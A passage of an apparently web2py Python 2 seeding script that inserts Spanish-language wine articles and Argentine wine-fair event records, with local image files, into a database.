db.noticia.insert(titulo='¿QUÉ VINOS PROBAR PARA EMPEZAR A BEBER VINO?',fecha=datetime.strptime('02/08/2016',fdate),cuerpo='¿Sentís curiosidad pero no sabés por dónde empezar en el mundo del vino? En esta nota, una sencilla hoja de ruta y sus recomendados para llegar a amar al vino. Diarios, revistas y radios hablan de vinos con displicencia porque, como el teatro ...,',copete='¿Sentís curiosidad pero no sabés por dónde empezar en el mundo del vino? En esta nota, una sencilla hoja de ruta y sus recomendados para llegar a amar al vino. Diarios, revistas y radios hablan de vinos con displicencia porque, como el teatro ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_53658_default_big.jpeg','rb'))
db.noticia.insert(titulo='12 INFOGRAFÍAS SOBRE MARIDAJE DEL VINO',fecha=datetime.strptime('29/07/2016',fdate),cuerpo='El maridaje es un arte cautivador donde se puede combinar, armonizar o acompañar, los distintos tipos de vino con los diferentes sabores gastronómicos con el fin de ensalzarlos. Es una experiencia singular para experimentar y disfrutar con los sent ...,',copete='El maridaje es un arte cautivador donde se puede combinar, armonizar o acompañar, los distintos tipos de vino con los diferentes sabores gastronómicos con el fin de ensalzarlos. Es una experiencia singular para experimentar y disfrutar con los sent ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_53660_default_big.jpeg','rb'))
db.noticia.insert(titulo='LOS VINOS MÁS VENDIDOS DE ESPACIOVINO EN JULIO',fecha=datetime.strptime('27/07/2016',fdate),cuerpo='Estamos acostumbrados a que los expertos del mundo del vino nos recomienden vinos para tener, para probar, etc. En esta nota, te contamos lo que le gusta al público, que en definitiva es lo que nunca falla! 1) Hey Malbec - PROMOCIÓN! Frutas ro ...,',copete='Estamos acostumbrados a que los expertos del mundo del vino nos recomienden vinos para tener, para probar, etc. En esta nota, te contamos lo que le gusta al público, que en definitiva es lo que nunca falla! 1) Hey Malbec - PROMOCIÓN! Frutas ro ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_53698_default_big.jpeg','rb'))
db.noticia.insert(titulo='CÓMO ENFRIAR EL VINO CORRECTAMENTE',fecha=datetime.strptime('25/07/2016',fdate),cuerpo='¿Debemos enfriar los vinos o se deben de beber a temperatura ambiente? ¿Cualquier método es el idóneo para que alcancen la temperatura correcta? Cuando un vino no se encuentra a su temperatura de consumo se debe de enfriar, incluido los vinos ti ...,',copete='¿Debemos enfriar los vinos o se deben de beber a temperatura ambiente? ¿Cualquier método es el idóneo para que alcancen la temperatura correcta? Cuando un vino no se encuentra a su temperatura de consumo se debe de enfriar, incluido los vinos ti ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_53890_default_big.png','rb'))
db.noticia.insert(titulo='15 BOTELLEROS SUPER MODERNOS',fecha=datetime.strptime('22/07/2016',fdate),cuerpo='¿Has encontrado el botellero de tus sueños? Seguro que entre los siguientes inspiradores, originales, creativos, prácticos y sofisticados ejemplos, te quedas con alguno. 1. Como gotas de “Lluvia” Modelo “Lluvia” de Edgar Navarro ...,',copete='¿Has encontrado el botellero de tus sueños? Seguro que entre los siguientes inspiradores, originales, creativos, prácticos y sofisticados ejemplos, te quedas con alguno. 1. Como gotas de “Lluvia” Modelo “Lluvia” de Edgar Navarro ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_54161_default_big.png','rb'))
db.noticia.insert(titulo='LAS 13 TIENDAS DE VINOS MÁS ESPECTACULARES DEL MUNDO',fecha=datetime.strptime('19/07/2016',fdate),cuerpo='Verdaderos templos del diseño que acogen los vinos del mundo con mimo, estilo, creatividad e innovación. Lugares de deleite y satisfacción, donde acercarse a buscar y elegir un caldo, supone todo un proceso de disfrute. 1. Budapest El est ...,',copete='Verdaderos templos del diseño que acogen los vinos del mundo con mimo, estilo, creatividad e innovación. Lugares de deleite y satisfacción, donde acercarse a buscar y elegir un caldo, supone todo un proceso de disfrute. 1. Budapest El est ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_54255_default_big.png','rb'))
db.noticia.insert(titulo='5 TIPOS DE TAPONES DE VINO, SUS VENTAJAS E INCONVENIENTES',fecha=datetime.strptime('14/07/2016',fdate),cuerpo='¿Cuáles son los materiales utilizados en el tapón? ¿Por qué unos son más convenientes que otros? ¿Depende del tipo de vino? El tapón tiene la función de proteger de cualquier daño al vino hasta su consumo final. Incluso los hay que parti ...,',copete='¿Cuáles son los materiales utilizados en el tapón? ¿Por qué unos son más convenientes que otros? ¿Depende del tipo de vino? El tapón tiene la función de proteger de cualquier daño al vino hasta su consumo final. Incluso los hay que parti ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_54484_default_big.jpeg','rb'))
db.noticia.insert(titulo='LAS 15 RAZONES POR LAS QUE EL VINO ES BUENO PARA LA SALUD',fecha=datetime.strptime('12/07/2016',fdate),cuerpo='¿Imaginabas que el vino pudiese aportar tantos beneficios? Además del homenaje a los sentidos que supone una copa de vino, permanecen en silencio un universo de propiedades conocidas desde la antigüedad, otras descubiertas gracias a los trabajos r ...,',copete='¿Imaginabas que el vino pudiese aportar tantos beneficios? Además del homenaje a los sentidos que supone una copa de vino, permanecen en silencio un universo de propiedades conocidas desde la antigüedad, otras descubiertas gracias a los trabajos r ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_54493_default_big.jpeg','rb'))
db.noticia.insert(titulo='CÓMO ABRIR UNA BOTELLA DE VINO CORRECTAMENTE',fecha=datetime.strptime('07/07/2016',fdate),cuerpo='¿Es realmente tan complicado abrir una botella de vino? ¿Por qué nos sentimos a veces tímid@s de hacerlo? ¿Cada vino exige un sacacorchos diferente? ¿Existe una técnica orientativa de ayuda? Antes de aplicar los pasos para abrir la estupend ...,',copete='¿Es realmente tan complicado abrir una botella de vino? ¿Por qué nos sentimos a veces tímid@s de hacerlo? ¿Cada vino exige un sacacorchos diferente? ¿Existe una técnica orientativa de ayuda? Antes de aplicar los pasos para abrir la estupend ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_54919_default_big.jpeg','rb'))
db.noticia.insert(titulo='LOS 12 AROMAS Y OLORES MÁS RAROS DEL VINO',fecha=datetime.strptime('04/07/2016',fdate),cuerpo='¿Olores empireumáticos, balsámicos o lácticos? Son algunos de los extraños aromas que están presentes en el vino. Notas sorprendentes, que nos ayudarán a comunicar las percepciones olfativas asociadas a olores de nuestro entorno más cercano. ...,',copete='¿Olores empireumáticos, balsámicos o lácticos? Son algunos de los extraños aromas que están presentes en el vino. Notas sorprendentes, que nos ayudarán a comunicar las percepciones olfativas asociadas a olores de nuestro entorno más cercano. ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_54969_default_big.jpeg','rb'))
db.noticia.insert(titulo='6 TRUCOS PARA CONSERVAR UNA BOTELLA DE VINO ABIERTA',fecha=datetime.strptime('30/06/2016',fdate),cuerpo='¿Sabes mantener el vino una vez abierto? ¿Conoces las herramientas o las alternativas de ayuda? ¿Qué podemos hacer para conservarlo? En ocasiones, dudamos en abrir una botella de vino únicamente porque pensamos en tomar un par de copas y nos pre ...,',copete='¿Sabes mantener el vino una vez abierto? ¿Conoces las herramientas o las alternativas de ayuda? ¿Qué podemos hacer para conservarlo? En ocasiones, dudamos en abrir una botella de vino únicamente porque pensamos en tomar un par de copas y nos pre ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_55308_default_big.jpeg','rb'))
db.noticia.insert(titulo='CUÁLES SON LAS NUEVAS PALABRAS USADAS PARA DESCRIBIR VINOS',fecha=datetime.strptime('28/06/2016',fdate),cuerpo='El vino cambió su estilo y un nuevo lenguaje gana forma. Si querés entender de qué hablan los enólogos cuando dice filo, tiza y nervio, lo que sigue es para vos. A la hora de probar un vino la lengua es clave. Sin embargo, es la otra lengua, la ...,',copete='El vino cambió su estilo y un nuevo lenguaje gana forma. Si querés entender de qué hablan los enólogos cuando dice filo, tiza y nervio, lo que sigue es para vos. A la hora de probar un vino la lengua es clave. Sin embargo, es la otra lengua, la ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_55358_default_big.jpeg','rb'))
db.noticia.insert(titulo='LOS VINOS MÁS VENDIDOS DE ESPACIOVINO',fecha=datetime.strptime('23/06/2016',fdate),cuerpo='Estamos acostumbrados a que los expertos del mundo del vino nos recomienden vinos para tener, para probar, etc. En esta nota, te contamos lo que le gusta al público, que en definitiva es lo que nunca falla! 1) Trumpeter Malbec - PROMOCIÓN! Rojo ...,',copete='Estamos acostumbrados a que los expertos del mundo del vino nos recomienden vinos para tener, para probar, etc. En esta nota, te contamos lo que le gusta al público, que en definitiva es lo que nunca falla! 1) Trumpeter Malbec - PROMOCIÓN! Rojo ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_55439_default_big.jpeg','rb'))
db.noticia.insert(titulo='LOS 6 CRITERIOS QUE DETERMINAN LA CALIDAD EN EL VINO',fecha=datetime.strptime('21/06/2016',fdate),cuerpo='Si pudieras ver en la etiqueta de un vino sus parámetros técnicos, para valorar su calidad ¿sabrías si son correctos? Catar el vino es siempre la mejor opción, pero podemos llegar un poco más allá si vemos los análisis organolépticos. Cuand ...,',copete='Si pudieras ver en la etiqueta de un vino sus parámetros técnicos, para valorar su calidad ¿sabrías si son correctos? Catar el vino es siempre la mejor opción, pero podemos llegar un poco más allá si vemos los análisis organolépticos. Cuand ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_55470_default_big.jpeg','rb'))
db.noticia.insert(titulo='¿CÓMO SE PUNTÚA UN VINO?',fecha=datetime.strptime('13/06/2016',fdate),cuerpo='¿Qué son las puntuaciones del vino? ¿Por qué existen diferentes sistemas de puntuación? ¿Quiénes son los gurús, expertos, las máximas autoridades responsables de estos sistemas? Ante la decisión de comprar un vino u otro, o bien nos guiamo ...,',copete='¿Qué son las puntuaciones del vino? ¿Por qué existen diferentes sistemas de puntuación? ¿Quiénes son los gurús, expertos, las máximas autoridades responsables de estos sistemas? Ante la decisión de comprar un vino u otro, o bien nos guiamo ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_55731_default_big.jpeg','rb'))
db.noticia.insert(titulo='LAS MEJORES OPCIONES PARA REGALAR EL DÍA DEL PADRE ESTÁN EN ESPACIOVINO!',fecha=datetime.strptime('06/06/2016',fdate),cuerpo='Te invitamos a nuestra sección especialmente pensada para que que papá reciba el regalo que se merece en su día. Clickeando en cada una de las opciones podrás ver el precio promocionado. Aquí puedes ver toda nuestra selección= Si tu ...,',copete='Te invitamos a nuestra sección especialmente pensada para que que papá reciba el regalo que se merece en su día. Clickeando en cada una de las opciones podrás ver el precio promocionado. Aquí puedes ver toda nuestra selección= Si tu ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_55887_default_big.jpeg','rb'))
db.noticia.insert(titulo='¿CÓMO RECONOCER UN BUEN VINO DE UN MAL VINO?',fecha=datetime.strptime('03/06/2016',fdate),cuerpo='Entre las preguntas que todos nos hacemos sobre vino, esta es una de las más frecuentes. ¿Qué observar para no pifiarla? Todos conocemos a alguien que alguna vez, por maldad o dulce venganza, le cambió el vino a otro. Es la clásica= alguien tra ...,',copete='Entre las preguntas que todos nos hacemos sobre vino, esta es una de las más frecuentes. ¿Qué observar para no pifiarla? Todos conocemos a alguien que alguna vez, por maldad o dulce venganza, le cambió el vino a otro. Es la clásica= alguien tra ...,',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_55891_default_big.jpeg','rb'))
db.noticia.insert(titulo='DISECCIÓN DE UNA UVA',fecha=datetime.strptime('30/05/2016',fdate),cuerpo='Un vino es el resultado de muchos factores= la tierra, el clima, las técnicas de viticultura, la elaboración, las manos del enólogo…Todos ellos son relevantes pero sin duda es la uva la que determina las características del vino. El grano de ...',copete='Un vino es el resultado de muchos factores= la tierra, el clima, las técnicas de viticultura, la elaboración, las manos del enólogo…Todos ellos son relevantes pero sin duda es la uva la que determina las características del vino. El grano de ...',autor='Jose Vinos',imagen=open('C:\\imagenes\\noticias\\thumb_55897_default_big.jpeg','rb'))
print 'inserts correctos'
except Exception as e:
print e
return True
def insertEventos():
db.evento.truncate()
from datetime import datetime
fdate='%d/%m/%Y'
try:
a()
b()
c()
except Exception as e:
print e
return True
def insertPromociones():
return True
def a():
from datetime import datetime
fdate='%d/%m/%Y'
try:
db.evento.insert(
fecha=datetime.strptime('15/9/2016',fdate), fecha_fin=datetime.strptime('17/9/2016',fdate), precio='$250', direccion='La Rural, Predio Ferial de Buenos Aires', detalle='''Del 15 al 17 de septiembre, de 18 a 23hs. en el Pabellón Frers, La Rural recibe al mundo del vino en la decimosexta edición de la feria Vinos & Bodegas, un clásico que se renueva cada año para brindar a los visitantes una experiencia de disfrute única. Con las nuevas propuestas de más de 40 bodegas argentinas, catas guiadas, Dj´s, food trucks y mercado gourmet, este evento se consolida como el espacio de reunión por excelencia de los amantes del vino.
Vinos & Bodegas invita a descubrir en un mismo lugar y a través de un recorrido temático las distintas regiones productoras de vino: la ruta del Malbec, cepa emblemática de la argentina; la ruta del Torrontés, una variedad blanca autóctona con gran presencia en el norte del país; la ruta Crianza pensada para conocer y entender las distintas denominaciones que encontramos en las etiquetas; la ruta de variedades no tradicionales, que transportan al Tempranillo, la Bonarda y el Cabernet Franc y la ruta de Dulces y Espumantes, una categoría ideal para cocktails, postres y festejos. Todo un recorrido organizado por la Escuela de Sommeliers del Gato Dumas, quienes a su vez, ofrecerán catas guiadas y maridajes, a cargo de sommeliers de su staff.
Entre las bodegas que participan, se encuentran: Bodega Altus, Bodega Fabre, Finca Sophenia, Bodegas Bianchi, Bodega del Fin del Mundo, Casarena Bodega y Viñedos, Bodega Norton, Viña las Perdices, Domaine Bousquet, Chakana Wines, Bodega Domingo Hermano, RPB, Bodega Tapiz, Bodega Trivento, Huarpe Wine, Bodega Salentein, Bodega Santa Julia, Bodega La Memé, Antonio Mas, RJ Viñedos, Bodega Riglos, JLW Wines, Estancia Mendoza, Viñas de UCO, Pontilli Wines, Mendoza Vineyards, Don Héctor, Bodega La Rural, Bodega Patritti, Bodega Schroeder, Bodega Secreto Patagónico, Escorihuela y Grupo Monet.
Dentro de las novedades de esta edición se destaca el desafío Vinos & Bodegas Challenge, un concurso donde los asistentes podrán puntuar los vinos que van probando y así premiar a los favoritos. Mediante catas a ciegas podrán votar los vinos agrupados en diferentes categorías (mejor cepa, mejor relación precio/calidad, mejor blend, entre otras). Desarrollado por WineOn, la propuesta invitará a los visitantes a dar su opinión acerca de cada etiqueta.
Los más foodies también tendrán lugar en Vinos & Bodegas, con muy buenas propuestas gastronómicas de los Food Trucks de Los Petersen, Guapaletas y Chivitos Rex, entre otros. También podrán acceder al Mercado Gourmet, que ofrecerá productos orgánicos así como aquellos seleccionados especialmente para la ocasión.
Vinos & Bodegas es un evento social cuyo objetivo es que los consumidores puedan apreciar los vinos disfrutando de sus características, aromas y sabores, junto a la oferta gastronómica del sector de food trucks. En este sentido y fomentando un consumo moderado de alcohol a través del programa Wine in Moderation, cada asistente contará con 12 cupones de degustación, disfrutando así de un consumo responsable.
Organizadores: organiza Bodegas de Argentina y realiza La Rural S.A
Sede: La Rural, Predio Ferial de Buenos Aires, Pabellón Frers.
Ingresos: Av. Santa Fe 4363
Estacionamiento: Av. Sarmiento 2704 y Av. Cerviño 4476
Días: 15, 16 y 17 de septiembre
Horario: 18 a 23hs.
Valor de la entrada: $250.-. (Incluye 12 copas de degustación)
Más información en: www.expovinosybodegas.com.ar''', nombre = 'JUMBO DELI & WINE 2016',caracteristicas= ' Tribuna Plaza será la sede de la tradicional Feria Jumbo Deli & Wine, que cumple su quinto año consecutivo en Buenos Aires, presentando toda la propuesta gourmet y productos premium que ofrece en sus góndolas durante todo el año. Una vez más ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18160_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('29/9/2016',fdate), fecha_fin=datetime.strptime('30/9/2016',fdate), direccion='Sheraton Mar del Plata Hotel', detalle='''Expo Di Vino, es un concepto de feria creado para cumplir, satisfacer y superar las expectativas comerciales de los expositores. Así también, fue diseñada para que toda persona del trade y el público especializado pueda disfrutar, bajo condiciones óptimas, de los mejores vinos de Argentina.''', nombre = 'SPARKLING NIGHTS 2016',caracteristicas= ' Sparkling Nights es la única feria de la Argentina dedicada exclusivamente a los espumantes. Esta será su octava edición. Durante 3 días, 35 de las bodegas más prestigiosas de la Argentina ofrecerán a los amantes del champagne la posibilidad ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18166_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('12/8/2016',fdate), fecha_fin=datetime.strptime('14/8/2016',fdate), direccion='"Municipalidad de Bragado. Alsina 178, Bragado."', detalle='''En Agosto llega la undécima edición de la exposición de vinos más reconocida del interior del país. Una propuesta cultural, turística y enogastronómica única en la provincia de Buenos Aires.
Expovinos Bragado continúa con su objetivo de acercar el mundo del vino y el buen vivir al interior del país, generando un espacio de disfrute, promoción y divulgación. Del 12 al 14 de Agosto, la undécima edición de la exposición de vinos más reconocida tendrá lugar en el Palacio Municipal de Bragado (Alsina 178, Bragado, Provincia de Buenos Aires).
Durante tres días los visitantes de Expovinos Bragado podrán disfrutar de las etiquetas de más de 20 bodegas, productos gourmet, aceites de oliva, un espacio de alta gama con etiquetas Premium, un almacén de promociones con importantes descuentos, muestras de arte y más.
Más información en: www.expovinosbragado.com.ar''', nombre = 'EXPO DI VINO',caracteristicas= ' Expo Di Vino, es un concepto de feria creado para cumplir, satisfacer y superar las expectativas comerciales de los expositores. Así también, fue diseñada para que toda persona del trade y el público especializado pueda disfrutar, bajo condicione ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18168_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('18/8/2016',fdate), fecha_fin=datetime.strptime('19/8/2016',fdate), precio='$400', direccion='"The Brick Hotel Buenos Aires (Posadas 1232),"', detalle='''Por primera vez, desembarca en la gran capital latinoamericana esta feria que reúne eitquetas súper top, elaboradas a partir de la sapiencia de enólogos renombrados.
La locación elegida es el sofisticado The Brick Hotel Buenos Aires (miembro de la colección de hoteles MGallery by Sofitel, de Accorhotels), en el corazón de Recoleta, frente al Patio Bullrich.
La organización estará a cargo de Augusto Saracco y César Moreno, en tándem con Javier Menajovsky (Wine Revolution).''', nombre = 'SEMINARIO DEL VINO ONLINE',caracteristicas= ' Con contenidos de alto interés para la gestión de la comunicación y el comercio digital, el lunes 26 de septiembre, de 8.30hs. a 18.00hs. tendrá lugar el Seminario del Vino Online en el Hotel Faena de Puerto Madero. En el encuentro s ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18176_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('30/6/2016',fdate), fecha_fin=datetime.strptime('30/6/2016',fdate), precio='$600', direccion='"La Bumón (Francisco Acuña de Figueroa 1800, CABA),"', detalle='''Inédito encuentro entre salientes Productores Independientes de Paraje Altamira (PiPA), que desembarcan con sus interesantísimas etiquetas en Buenos Aires. Será una excelente oportunidad para descubrir bondades y secretos de este rincón especial del Valle de Uco mendocino.
La propuesta contará con más de 30 vinos (partidas limitadas, súper cuidadas), cuyo valor parte de los $250. Lo más jugoso será la presencia de propietarios y winemakers, que interactuarán de manera muy distendida con el público.
Atención: solo hay 70 lugares disponibles. ¿Qué bodegas darán el presente? Altos las Hormigas, Chakana, Fincas Adrián Río, Finca Beth, Finca La Igriega, Finca Las Glicinas, Finca Suarez, Lupa, Son Vida, Teho y Traslapiedra.Paraje Altamira.
La buena noticia es que habrá un maridaje para el churrete con exquisiteces de La Bumón, la nueva apuesta gastronómica de la city.
Reservas: entradas@parajealtamira.org''', nombre = 'VINOS & BODEGAS 2016',caracteristicas= ' Del 15 al 17 de septiembre, de 18 a 23hs. en el Pabellón Frers, La Rural recibe al mundo del vino en la decimosexta edición de la feria Vinos & Bodegas, un clásico que se renueva cada año para brindar a los visitantes una experiencia de disfrute ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18177_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('23/11/2016',fdate), fecha_fin=datetime.strptime('25/11/2016',fdate), precio='$450', direccion='"Tribuna Plaza, Av. Del Libertador 4401, Palermo"', detalle='''Tribuna Plaza será la sede de la tradicional Feria Jumbo Deli & Wine, que cumple su quinto año consecutivo en Buenos Aires, presentando toda la propuesta gourmet y productos premium que ofrece en sus góndolas durante todo el año.
Una vez más disfrutar es la consigna; Jumbo Deli & Wine invita a quienes la visiten a sumergirse en diferentes espacios gourmet que prometen el maridaje ideal y un ambiente perfecto para vivir una experiencia única. Exquisitos vinos, deliciosos fiambres y quesos, carnes, panes, productos gourmet, cervezas, espirituosas, destilados, café y chocolates, son los sabores que se podrán degustar en la quinta edición de la Feria.
Datos sobre la Feria Jumbo Deli & Wine
Fecha: 23, 24 y 25 de noviembre
Lugar: Tribuna Plaza, Av. Del Libertador 4401, Palermo
Horario: 18 hs. a 22 hs.
Valor de la entrada: $450
Más información en: www.jumbodeliandwine.com.ar''', nombre = 'ALTA GAMA BUENOS AIRES',caracteristicas= ' Por primera vez, desembarca en la gran capital latinoamericana esta feria que reúne eitquetas súper top, elaboradas a partir de la sapiencia de enólogos renombrados. La locación elegida es el sofisticado The Brick Hotel Buenos Aires (miembro d ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18178_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('26/9/2016',fdate), fecha_fin=datetime.strptime('26/9/2016',fdate), precio='1800', direccion='Hotel Faena, Martha Salotti 445, CABA.', detalle='''Con contenidos de alto interés para la gestión de la comunicación y el comercio digital, el lunes 26 de septiembre, de 8.30hs. a 18.00hs. tendrá lugar el Seminario del Vino
Online en el Hotel Faena de Puerto Madero.
En el encuentro se darán a conocer los resultados de la investigación “Radiografía del
Vino Online en la Argentina”, realizada por Consultora Stg, que devela el perfil del
consumidor argentino de vinos, su comportamiento y hábitos en la web.
Hoy es fundamental saber a quién nos dirigimos cuando comunicamos por Internet, las
nuevas demandas y tendencias del mercado, como también casos exitosos de e-
commerce y comunicación online. Oradores destacados como Lis Clement, Directora
de la agencia Foster Newton y ex Gerente de Marketing de WofA, Jonny Dayán, CEO
de Tonel Privado, Sebastián Balbo, Manager de E-commerce y Marketing Digital de
Tonel Privado, Gonzalo Peña, ¡Socio-Gerente de Oh! Panel y Master en Investigación
de Opinión Pública, Pablo Santos, Director del proyecto VinoApp y Gerente de
Marketing de Xsi Latam, y Dolores Lavaque, Directora de Consultora Stg y Master del
Wine MBA de la Bordeaux Business School, entre otros, nos ayudarán a entender en
detalle insights, nuevas demandas, tendencias del mercado y casos exitosos de e-
commerce y de comunicación online del vino.
Inscripción: http://www.consultorastg.com/esp/eventos''', nombre = 'EXPOVINOS BRAGADO 2016',caracteristicas= ' En Agosto llega la undécima edición de la exposición de vinos más reconocida del interior del país. Una propuesta cultural, turística y enogastronómica única en la provincia de Buenos Aires. Expovinos Bragado continúa con su objetivo de ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18182_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('4/4/2016',fdate), fecha_fin=datetime.strptime('10/4/2016',fdate), precio='200', direccion='"Ciudad de Buenos Aires"', detalle='''4 al 10 de abril, con un despliegue de diferentes actividades en la Ciudad de Buenos Aires.
Para asistir a esta celebración, habrá una entrada que dará acceso a todas las actividades y se hará a beneficio del Hospital de Niños Dr. Ricardo Gutiérrez, de $200, en forma anticipada, y de $250 in situ."''', nombre = 'CAMINOS Y SABORES 2016',caracteristicas= ' Caminos y Sabores, a lo largo de sus once ediciones, se ha convertido en una de las ferias de mayor crecimiento, potenciando a su vez el desarrollo de todos sus protagonistas: productores de alimentos típicos, artesanos y representantes de destinos ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18232_default_medium.png','rb'))
db.evento.insert(
fecha=datetime.strptime('15/2/2016',fdate), fecha_fin=datetime.strptime('19/2/2016',fdate), direccion='Ciudad de Mendoza', detalle='''Planeado para evaluar y premiar la calidad y los avances de la industria vitivinícola argentina, el Argentina Wine Awards ha ganado su lugar como el certamen más importante en la agenda local y gana cada vez más adeptos de otros rincones del mundo del vino. El año pasado participaron más de 669 vinos en el concurso.
Con el propósito de reflejar la proliferación de los vinos argentinos en todo el mundo y la importancia cada vez mayor de una variedad de mercados, se seleccionó un jurado que no sólo representa a diversos países y nacionalidades sino que también cuenta con un vasto conocimiento sobre la industria mundial. En esta edición, el panel Internacional estará compuesto por especialistas internacionales que han contribuido al crecimiento de la industria vitivinícola argentina bajo el concepto: 10 YEARS CREATING THE FUTURE.
Tal como se ha hecho durante este el 2015, Wines of Argentina incluirá todos los vinos ganadores de los Trophy y Oro en sus actividades de promoción en el exterior para demostrar la alta calidad de los vinos de la Argentina.
Las degustaciones del certamen tendrán lugar en Mendoza, del 15 al 19 de febrero de 2016.''', nombre = 'PIPA',caracteristicas= ' Inédito encuentro entre salientes Productores Independientes de Paraje Altamira (PiPA), que desembarcan con sus interesantísimas etiquetas en Buenos Aires. Será una excelente oportunidad para descubrir bondades y secretos de este rincón especial ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18253_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('18/11/2015',fdate), fecha_fin=datetime.strptime('20/11/2015',fdate), precio='$399', direccion='Tribuna Plaza, Av. Del Libertador 4401, Palermo', detalle='''Tribuna Plaza será nuevamente la sede de la tradicional Feria Jumbo Deli & Wine, que cumple su cuarto año consecutivo en Buenos Aires, presentando toda la propuesta gourmet y productos premium que ofrece en sus góndolas durante todo el año.
Una vez más disfrutar es la consigna; Jumbo Deli & Wine invita a quienes la visiten a sumergirse en diferentes espacios gourmet que prometen el maridaje ideal y un ambiente perfecto para vivir una experiencia única. Exquisitos vinos, deliciosos fiambres y quesos, carnes, panes, productos gourmet, cervezas, espirituosas, destilados, café y chocolates, son los sabores que se podrán degustar en la cuarta edición de la Feria.
Con una ambientación distinguida y original, transportará a los invitados a la época del Gran Gatsby de los años 30. Jumbo Deli & Wine 2015 reúne a las marcas más prestigiosas que, con sus mejores propuestas gourmet, hacen deleitar a los argentinos.
Como destacado, este año la Feria incorpora un nuevo espacio, Jumbo Fresh donde la marca presentará y dará a degustar sus productos de elaboración propia y se podrán saborear los panes más exclusivos de Jumbo: sticks, saborizados, panes de queso, focaccia de salmón, entre otros. También, en ese mismo stand, se lucirán las distintas variedades de frutas y verduras donde se degustarán dips de zanahoria, apio y morrón; pinchos de tomate cherry y fruta recién cortada; además de las carnes Premium de Jumbo. Jumbo Fresh ofrece productos frescos todos los días del año.
Jumbo Deli & Wine 2015, sabores, placeres, experiencias y momentos para descubrir y dejarse sorprender. Todo en un solo lugar. Más información en www.jumbodeliandwine.com.ar
Datos sobre la Feria Jumbo Deli & Wine
Fecha: 18, 19 y 20 de noviembre
Lugar: Tribuna Plaza, Av. Del Libertador 4401, Palermo
Horario: 18 hs. a 23 hs.
Valor de la entrada: $399"''', nombre = 'LA SEMANA DEL MALBEC',caracteristicas= ' 4 al 10 de abril, con un despliegue de diferentes actividades en la Ciudad de Buenos Aires. Para asistir a esta celebración, habrá una entrada que dará acceso a todas las actividades y se hará a beneficio del Hospital de Niños Dr. Ricardo Gut ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18313_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('7/7/2016',fdate), fecha_fin=datetime.strptime('10/7/2016',fdate), precio='$110', direccion='La Rural, Predio Ferial de Buenos Aires.', detalle='''Caminos y Sabores, a lo largo de sus once ediciones, se ha convertido en una de las ferias de mayor crecimiento, potenciando a su vez el desarrollo de todos sus protagonistas: productores de alimentos típicos, artesanos y representantes de destinos turísticos. En la última edición, la feria convocó a más de 80.000 personas que disfrutaron del recorrido por el mercado, de las demostraciones de cocina, disertaciones y espectáculos artísticos.
Lo que hay que saber
DATOS GENERALES:
• Fecha: del jueves 7 al domingo 10 de julio
• Horario: de 12 a 21hs.
• Lugar: La Rural, Predio Ferial de Buenos Aires – Ciudad Autónoma de Buenos Aires.
• Ingreso: por Av. Sarmiento 2704.
VALOR DE LA ENTRADA
• Entrada general $ 110
• Entrada general con Catálogo de Expositores $ 150
• Entrada Plus: $250 - ¡Numerosos beneficios pensados para vos!
• Todos los días: Menores de 5 años –acompañados por un mayor- no abonan entrada.
Más información: http://www.caminosysabores.com.ar/ ''', nombre = 'RALLY DE LAS BODEGAS "COPA PARK HYATT" 2016',caracteristicas= ' El Rally de la Bodegas en su 14ª Edición consecutiva, organizado por el CLUB MENDOZA CLÁSICOS & SPORT es uno de los eventos de mayor importancia de autos históricos del país. Comenzó una nueva etapa con el acuerdo alcanzado con CLARAMUNT GARAG ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18357_default_medium.jpeg','rb'))
except Exception as e:
print e
return True
def b():
from datetime import datetime
fdate='%d/%m/%Y'
try:
db.evento.insert(
fecha=datetime.strptime('9/11/2016',fdate), fecha_fin=datetime.strptime('11/11/2016',fdate), precio='$420', direccion='Hotel Panamericano - Ciudad de Buenos Aires.', detalle='''Sparkling Nights es la única feria de la Argentina dedicada exclusivamente a los espumantes. Esta será su octava edición.
Durante 3 días, 35 de las bodegas más prestigiosas de la Argentina ofrecerán a los amantes del champagne la posibilidad de degustar más de 200 variedades, para conocer las últimas tendencias y todas las novedades que ofrece este año el creciente mercado de los vinos espumantes.
La cita será en el elegante Hotel Panamericano de Buenos Aires, del 9 al 11 de noviembre, entre las 18 y las 23 horas.
